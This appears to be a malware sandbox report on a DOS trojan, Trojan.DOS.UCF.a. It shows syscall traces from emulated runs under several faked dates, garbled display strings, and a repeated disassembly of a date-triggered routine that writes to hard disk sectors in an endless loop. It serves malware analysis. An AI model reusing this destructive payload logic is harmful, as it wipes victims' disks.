Sample viewer

vx.netlux.org/Trojan.DOS.UCF.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:49:59.769602331Z 42 PC: 13855 | Get date 0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax
2018-12-17T22:49:59.77250335Z 53 PC: 12f47 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:49:59.774395335Z 37 PC: 12f57 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:49:59.775408984Z 53 PC: 12f5c | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-17T22:49:59.776475961Z 37 PC: 12f6c | Set interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-17T22:49:59.780748113Z 9 PC: 13289 | Display string (String= '�XZ�����D')
2018-12-17T22:49:59.787083445Z 9 PC: 13289 | Display string (String= '���tf��u��������S@�`��������F<�u#��������t�P_��������������<-t��tPVh�6������ ����1�[^ÊP��t;VS������ ��������и��t!RSVh�6�������1��=�c���1��[^�VS��(�É���P����Ph=7�����&1ҍD')
2018-12-17T22:49:59.792605201Z 9 PC: 13289 | Display string (String= ' ��p�室 �� ���᪨� ॣ����: ')
2018-12-17T22:49:59.796958234Z 9 PC: 13289 | Display string (String= '�ࠢ� Shift')
2018-12-17T22:49:59.799085174Z 9 PC: 13289 | Display string (String= ' �� ��⨭᪨�: ')
2018-12-17T22:49:59.805302515Z 9 PC: 13289 | Display string (String= '���� Shift')
2018-12-17T22:49:59.807947475Z 9 PC: 13289 | Display string (String= ' ')
2018-12-17T22:49:59.811437408Z 49 PC: 12f98 | Terminate and stay resident (Return code = '0' | Memory size = '63')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10071,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:07.508755664Z 42 PC: 13855 | Get date 0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax
2018-12-25T12:27:07.513368917Z 53 PC: 12f47 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:07.515134456Z 37 PC: 12f57 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:07.516516908Z 53 PC: 12f5c | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:07.517979037Z 37 PC: 12f6c | Set interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:07.52032903Z 9 PC: 13289 | Display string (String= '�XZ�����D')
2018-12-25T12:27:07.528369994Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.535249763Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.543016852Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.545484364Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.550302988Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.560438602Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:07.565303347Z 49 PC: 12f98 | Terminate and stay resident (Return code = '0' | Memory size = '63')

{"DateBased":true,"Day":30,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10071,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:07.653998037Z 42 PC: 13855 | Get date 0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10071,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:08.061347525Z 42 PC: 13855 | Get date 0x13855: cmp cx, 0x60
0x13859: jb 0x13875
0x1385b: cmp dh, 0xc
0x1385e: jb 0x13875
0x13860: cmp dl, 0x1e
0x13863: jb 0x13875
0x13865: mov ax, 0x35f
0x13868: mov bx, 0x1020
0x1386b: mov cx, 1
0x1386e: mov dx, 0x80
0x13871: int 0x13
0x13873: jmp 0x13865
0x13875: mov al, 0xe9
0x13877: mov byte ptr [0x100], al
0x1387a: mov al, 0xec
0x1387c: mov byte ptr [0x101], al
0x1387f: mov al, 2
0x13881: mov byte ptr [0x102], al
0x13884: mov ax, 0x100
0x13887: push ax
2018-12-25T12:27:08.065329956Z 53 PC: 12f47 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:08.066654057Z 37 PC: 12f57 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:27:08.067770789Z 53 PC: 12f5c | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:08.069518475Z 37 PC: 12f6c | Set interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T12:27:08.071174806Z 9 PC: 13289 | Display string (String= '�XZ�����D')
2018-12-25T12:27:08.078482117Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.084688775Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.091485435Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.093888499Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.09872268Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.101871528Z 9 PC: 13289 | Display string (See above)
2018-12-25T12:27:08.106586235Z 49 PC: 12f98 | Terminate and stay resident (Return code = '0' | Memory size = '63')